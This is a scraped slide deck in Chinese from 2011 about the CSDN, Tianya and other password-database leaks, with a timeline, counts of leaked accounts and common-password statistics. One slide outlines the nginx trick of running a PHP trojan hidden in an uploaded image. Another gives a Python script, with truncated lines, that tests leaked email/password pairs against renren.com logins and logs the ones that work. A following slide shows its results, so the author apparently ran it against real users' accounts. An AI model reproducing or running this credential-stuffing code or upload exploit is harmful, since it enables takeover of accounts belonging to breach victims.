Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

csdn 密码泄露

2,466 views

Published on

csdn 密码泄露等一系列网站密码泄露问题

Published in: Education
  • Be the first to comment

  • Be the first to like this

csdn 密码泄露

  1. 1. .. 关注密码泄露事件 12.31.2011 logo . . . . . . 关注密码泄露事件
  2. 2. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  3. 3. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  4. 4. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  5. 5. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  6. 6. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  7. 7. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  8. 8. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  9. 9. . 事件起因:CSDN 密码泄露 . 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
  10. 10. . 密码泄露情况 CSDN 6,428,632 个帐号 帐号, 明文密码, 电子邮件 多玩 8,305,005 个帐号 帐号, 加密密码, 部分明文密码等 178.COM 1,883,487 增加中 帐号, 加密密码, 全部明文密码等 天涯 4000W+ 账号 帐号, 明文密码, 电子邮件 人人网 4,768,600 个帐号 明文密码, 电子邮件 梦幻西游 约 1.4G(木马盗取) 帐号, 邮箱, 明文密码等 微博 未知个帐号 邮箱, 明文密码 当当网 10 万用户资料 真实姓名、电子邮件等个人信息 凡客 20 万用户资料 真实姓名、电子邮件等个人信息 卓越 20 万用户资料 真实姓名、电子邮件等个人信息 ··· ········· ········· logo . . . . . . 关注密码泄露事件
  11. 11. . 密码泄露原因及猜测 . 以 CSDN 为代表的明文保存密码 . 2009 年 11 月之前是明文,2009 年 11 月之后是加密的,但部分 明文密码未清理,2011 年 5 月 12 日清理掉了所有明文密码。所 以从 2011 年 5 月 12 日开始全部都是安全的,5 月 12 日之前的 有可能不安全。 . . nginx web 服务器漏洞 . 对用户开放上传图片权限造成的。黑客可以通过在图片后附加一 段 PHP 木马脚本上传,然后利用 nginx 的漏洞执行该脚本(然 后输入/scripts/80sec.jpg/80sec.php 以 php 进行解析) . 。 . 木马 . 多 . 玩网、梦幻西游账户通过木马泄露 . 另一个大胆猜测 . logo 众多网站同类后门被发现! . . . . . . . 关注密码泄露事件
  12. 12. . 完全密码统计 (摘自网上:最多使用的密码) rank 密码 次数 rank 密码 次数 1 123456 4,138,464 11 123321 183,741 2 123456789 1,070,028 12 666666 134,599 3 111111 1,033,040 13 1234567 127,268 4 123123 471,036 14 111222tianya 116,015 5 000000 428,307 15 7758521 115,560 6 12345678 409,722 16 1314520 115,227 7 wodima123 392,869 17 888888 110,647 8 5201314 298,458 18 a321654 106,441 9 a123456 195,049 19 654321 100,137 10 11111111 186,429 20 woaini 99,977 logo . . . . . . 关注密码泄露事件
  13. 13. . CSDN 密码统计 (摘自网上:密码组成) . 按字符类型(数字,小写字母,大写字母,其他符号) . 字符种类数 1 2 3 4 密码个数 3,667,174 2,512,212 234,712 14,268 . 比例 57.05% 39.08% 3.65% 0.22% . 按字符长度 . 密码长度 1-7 位 8-11 位 12-15 位 16 位及以上 密码个数 141,264 4,810,335 1,393,025 83,742 . 比例 2.20% 74.83% 21.67% 1.30% logo . . . . . . 关注密码泄露事件
  14. 14. . 密码真实性验证(自己动手,丰衣足食) for uline in ulines: count=count+1 usps = uline.split() email = usps[0] password = usps[1] myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar() openner = urllib2.build_opener(myCookie) post_data = {email:email,password:password,origURL:ht #post_data = {username:email,password:password,origURL req = urllib2.Request(http://www.renren.com/PLogin.do, url html_src = openner.open(req).read() if html_src.find( 没有更多新鲜事了)==-1: print count,email,password,"failn" else: print count,email,password,"success !!!n" str_cr=usps[0]+ +usps[1]+n logo fcrack.write(str_cr) . . . . . . 关注密码泄露事件
  15. 15. . 实验结果(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  16. 16. CSDN 密码类型与平均长度统计(自己动手,丰衣足. 食) logo . . . . . . 关注密码泄露事件
  17. 17. CSDN 密码类型与平均长度统计(自己动手,丰衣足. 食) logo . . . . . . 关注密码泄露事件
  18. 18. . CSDN 程序猿最喜爱的密码(自己动手,丰衣足食) 1qaz2wsx 3667 11223344 4096 a123456789 4435 66666666 5025 1111111111 5145 aaaaaaaa 5460 987654321 5553 147258369 5966 111111111 6995 88888888 15033 1234567890 17791 123123123 19986 00000000 34952 dearbook 46053 11111111 76346 12345678 212751 logo 123456789 235032 . . . . . . 关注密码泄露事件
  19. 19. . CSDN 邮箱类型统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  20. 20. . CSDN 邮箱类型统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  21. 21. . K7K7 密码长度统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  22. 22. . K7K7 密码长度统计(自己动手,丰衣足食) logo . . . . . . 关注密码泄露事件
  23. 23. . k7k7 群众最喜欢的密码(自己动手,丰衣足食) 112233 4844 woaini 5714 1234567 6228 666666 6358 1314520 6592 11111111 7860 7758521 7900 123321 11080 123 11527 12345678 13856 wangyut2 17016 5201314 21744 123123 39173 123456789 40035 0 50952 111111 74182 logo 123456 256310 . . . . . . 关注密码泄露事件
  24. 24. . 为什么密码泄露这么严重而广泛? . CSDN 创始人蒋涛对此发表了评价 . . 1 某上市公司忙着造假库往外扔,栽赃其他公司,想摆脱被曝 明文库的证据 . 2 有网站通知所有用户改密码,乘机激活用户 3. 还有网站把这些公开库的数据直接导入自己用户库,也发通 知给用户改密码 . 4 钓鱼的垃圾邮件的都活跃起来了 . . 肇事者 === 水很深啊 . . 1 向微博实名制的挑衅 . 2 黑客行为,够呛 3. 安全厂商行为(金山,天涯快压) . 4 蝴蝶效应。 . logo . . . . . . 关注密码泄露事件
  25. 25. Happy New Year!!! . . . . . .
  26. 26. Happy New Year!!! . . . . . .
  27. 27. Happy New Year!!! . . . . . .
  28. 28. Happy New Year!!! . . . . . .
  29. 29. Happy New Year!!! . . . . . .
  30. 30. Happy New Year!!! . . . . . .
  31. 31. Happy New Year!!! . . . . . .
  32. 32. Happy New Year!!! . . . . . .
  33. 33. Happy New Year!!! . . . . . .
  34. 34. Happy New Year!!! . . . . . .

×